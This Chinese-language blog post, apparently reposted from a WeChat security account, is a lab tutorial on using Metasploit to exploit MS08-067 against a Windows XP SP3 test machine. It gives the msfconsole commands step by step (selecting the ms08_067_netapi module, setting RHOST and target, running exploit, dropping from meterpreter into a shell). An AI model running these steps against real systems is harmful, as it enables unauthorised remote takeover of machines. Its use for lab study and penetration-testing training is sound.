MSF系列(五)| Metasploit漏洞攻击

admin 2022年8月23日23:06:00安全文章评论2 views792字阅读2分38秒阅读模式
‖ 点击蓝字·关注我们


实验环境

MSF系列(五)| Metasploit漏洞攻击
  • Kali
  • windows xp sp3
实验步骤
MSF系列(五)| Metasploit漏洞攻击
1.msfconsole使用search命令搜索MS08067漏洞攻击程序
MSF系列(五)| Metasploit漏洞攻击

MSF系列(五)| Metasploit漏洞攻击

从结果中得到

Name exploit/windows/smb/ms08_067_netapiDisclosure Date:2008-10-28Rank:greatDescription:MS08-067 Microsoft Server Service Relative Path Stack Corruption

2.使用use命令调用MS08067漏洞攻击程序

use exploit/windows/smb/ms08_067_netapi

MSF系列(五)| Metasploit漏洞攻击

3.使用show options 命令查看需要设置的选项

MSF系列(五)| Metasploit漏洞攻击

4.从图中可以看到还需设置RHOST(目标地址)、Exploit target(攻击目标)使用 set 命令设置 Module Options,此处需要设置目标IP

set RHOST 192.168.20.16

MSF系列(五)| Metasploit漏洞攻击

5.使用 set 命令设置后,可再使用show options 命令查看设置情况

MSF系列(五)| Metasploit漏洞攻击

6.使用check命令检查漏洞是否存在

MSF系列(五)| Metasploit漏洞攻击

7.设置Exploit target,使用show targets 查看可选项可以看出以下版本的系统均存在此漏洞因为实例演示的XP系统为WinXP SP3 简体中文版,即

MSF系列(五)| Metasploit漏洞攻击

8.使用set target 命令设置目标,此处即为set target 34

MSF系列(五)| Metasploit漏洞攻击

9.执行exploit命令后得到一个meterpreter

MSF系列(五)| Metasploit漏洞攻击

10.在meterpreter中输入shell即可进入CMD窗口

MSF系列(五)| Metasploit漏洞攻击

MSF系列(五)| Metasploit漏洞攻击

漏洞利用完成。


MSF系列(五)| Metasploit漏洞攻击
END

往期精选:

MSF系列(一)| 初识Metasploit

MSF系列(二)| MSF基础使用

MSF系列(三)| Metasploit情报收集

MSF系列(四)| Metasploit漏洞扫描


MSF系列(五)| Metasploit漏洞攻击
扫码关注我们
获取更多精彩内容

原文始发于微信公众号(长风实验室):MSF系列(五)| Metasploit漏洞攻击

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年8月23日23:06:00
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  MSF系列(五)| Metasploit漏洞攻击 http://cn-sec.com/archives/1250806.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: